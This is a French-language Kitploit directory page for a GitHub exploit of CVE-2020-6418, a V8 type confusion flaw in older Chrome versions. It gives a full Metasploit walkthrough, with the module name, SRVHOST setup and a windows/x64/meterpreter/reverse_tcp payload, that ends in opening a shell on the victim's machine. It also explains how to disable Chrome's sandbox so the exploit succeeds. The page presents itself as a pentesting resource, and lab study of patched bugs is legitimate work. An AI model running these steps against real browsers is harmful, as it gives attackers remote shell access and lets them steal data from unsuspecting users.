Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-6418 — Exploit pour CVE-2020-6418, une confusion de type dans V8, permettant l'exécution de code à distance via une page HTML conçue. Utilise Metasploit pour fournir une charge utile de shell inverse. | Kitploit
Outils/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Frameworks d'ExploitationGénération de PayloadsExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

Exploit pour CVE-2020-6418, une confusion de type dans V8, permettant l'exécution de code à distance via une page HTML conçue. Utilise Metasploit pour fournir une charge utile de shell inverse.

Voir le dépôt
113il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-6418

Le CVE-2020-6418 concerne une confusion de type dans V8 de Google Chrome. Les versions affectées étaient antérieures à 80.0.3987.122. La vulnérabilité est exploitée par un attaquant distant accédant au shell d'un appareil cible via une page HTML conçue à cet effet.

Prérequis environnementaux

  1. Google Chrome avec une version antérieure à 80.0.3987.122 .
root@kitploit:~
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
  1. Metasploit Framework
  2. OS : Tout

Configuration de l'exploit

  1. Google Chrome Version v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows 11
  3. Kali Linux 2021.1

Configuration de Google Chrome sans sandbox

i) Créez un raccourci pour Google Chrome
ii) Cliquez sur Propriétés > allez à l'option appelée "Cible"
iii) À la fin de EXE, donnez un espace et tapez -no--sandbox
iv) Cliquez sur Appliquer > OK
v) Ouvrez un nouveau navigateur Google Chrome et vous verrez une pop-up indiquant ceci :

root@kitploit:~
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

Démonstration pour désactiver le sandbox

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Utilisation de Metasploit

Puisque nous utilisons Kali comme environnement pour réaliser l'exploit, Metasploit est fourni en tant qu'outil intégré à la distribution. Mais si vous utilisez d'autres distributions, nous devons configurer Metasploit avant de commencer l'exploit.

Référez-vous à l'installation de Metasploit pour plus d'informations.

Exécution de l'exploit

i) Démarrage du framework Metasploit

root@kitploit:~
> msfconsole

ii) Trouvez l'exploit

root@kitploit:~
> search chrome_js

iii) Utilisez l'exploit disponible dans la sortie ci-dessus

root@kitploit:~
> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) Fournissez l'adresse IP SRVHOST

root@kitploit:~
> set SRVHOST <ip address>

v) Fournissez la cible Ici, nous avons deux options

  1. Cible 0 : Pour Windows
  2. Cible 1 : Pour MAC
root@kitploit:~
> set Target " Number "

vi) Fournissez la charge utile (payload)

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) Pour vérifier les paramètres actuels et les options activées.

root@kitploit:~
> show options

viii) Pour exécuter l'exploit

root@kitploit:~
> run (or) > exploit

ix) Vous recevrez une URL, qui doit être copiée dans le navigateur pour activer la session.

x) Une fois que l'utilisateur accède à l'URL, une session sera créée. Pour vérifier cela

root@kitploit:~
> show sessions

xi) En utilisant la session, nous pouvons vérifier les informations système de l'utilisateur / entrer dans le shell.

root@kitploit:~
> sessions <number>
> shell

Démonstration de l'exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

Télécharger l’outil